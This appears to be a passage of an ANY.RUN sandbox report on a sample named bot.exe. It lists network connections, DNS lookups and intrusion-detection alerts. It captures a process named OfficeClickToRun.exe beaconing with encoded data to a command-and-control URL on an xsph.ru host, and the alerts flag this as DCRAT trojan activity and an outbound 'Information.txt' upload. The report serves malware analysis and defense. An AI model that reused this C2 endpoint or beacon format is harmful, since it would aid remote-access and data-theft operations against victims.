Z1EWZ3MmM2IiOiQDNxE2MzUmZjNDM2UTN5YmYiZWO1QGN4UjYhZmZ5YzNis3W
RU
text
104 b
whitelisted
5580
OfficeClickToRun.exe
GET
200
141.8.192.217:80
http://a1048688.xsph.ru/L1nc0In.php?EnMYdVOlhjyLuxwV=rhlpGQR2jcbNELIqDUaLb8GT&7949c3113baf8faccc2f8206ce931809=QZjdjNhV2Y5ITMxMTYmdjNmVTNhhDOhljY0QWO4QWMjlzYxIzN4IjN5kDO2MTO2MTMyYzN0kzM&c21ebdd65b88aaf7ffae2de46f46263a=gYxYDZ2QWN0ITOjVjZ0IGOyYmYlFmMhZ2M5YGNjBzMxQTMiJTOzMGN&8b190146bf783a33c32f02b472d55240=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
RU
text
104 b
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:137
whitelisted
6944
svchost.exe
20.73.194.208:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
7044
RUXIMICS.exe
20.73.194.208:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
5488
MoUsoCoreWorker.exe
20.73.194.208:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
4
System
192.168.100.255:138
whitelisted
5488
MoUsoCoreWorker.exe
104.103.72.96:80
crl.microsoft.com
Akamai International B.V.
AT
whitelisted
6944
svchost.exe
104.103.72.96:80
crl.microsoft.com
Akamai International B.V.
AT
whitelisted
7044
RUXIMICS.exe
104.103.72.96:80
crl.microsoft.com
Akamai International B.V.
AT
whitelisted
5488
MoUsoCoreWorker.exe
2.18.69.217:80
www.microsoft.com
AKAMAI-AS
AT
whitelisted
6944
svchost.exe
2.18.69.217:80
www.microsoft.com
AKAMAI-AS
AT
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 20.73.194.208
  • 40.127.240.158
  • 4.231.128.59
whitelisted
google.com
  • 142.250.185.110
whitelisted
crl.microsoft.com
  • 104.103.72.96
  • 2.23.154.57
whitelisted
www.microsoft.com
  • 2.18.69.217
whitelisted
a1048688.xsph.ru
  • 141.8.192.217
whitelisted
config.edge.skype.com
  • 13.107.42.16
whitelisted
edge.microsoft.com
  • 204.79.197.239
  • 13.107.21.239
whitelisted
edge-mobile-static.azureedge.net
  • 13.107.246.45
whitelisted
business.bing.com
  • 13.107.6.158
whitelisted
bzib.nelreports.net
  • 2.19.126.152
  • 2.19.126.145
whitelisted

Threats

PID
Process
Class
Message
2172
svchost.exe
Misc activity
ET INFO Observed DNS Query to xsph .ru Domain
5580
OfficeClickToRun.exe
A Network Trojan was detected
ET MALWARE DCRAT Activity (GET)
5580
OfficeClickToRun.exe
Potentially Bad Traffic
ET HUNTING Observed POST to xsph .ru Domain
5580
OfficeClickToRun.exe
A Network Trojan was detected
ET HUNTING Observed Malicious Filename in Outbound POST Request (Information.txt)
7484
msedge.exe
Not Suspicious Traffic
INFO [ANY.RUN] Google Hosted Libraries (ajax .googleapis .com)
7484
msedge.exe
Not Suspicious Traffic
INFO [ANY.RUN] Google Hosted Libraries (ajax .googleapis .com)
7484
msedge.exe
Not Suspicious Traffic
INFO [ANY.RUN] Google Hosted Libraries (ajax .googleapis .com)
7484
msedge.exe
Not Suspicious Traffic
INFO [ANY.RUN] Google Hosted Libraries (ajax .googleapis .com)
4 ETPRO signatures available at the full report
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2026 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
bot.exe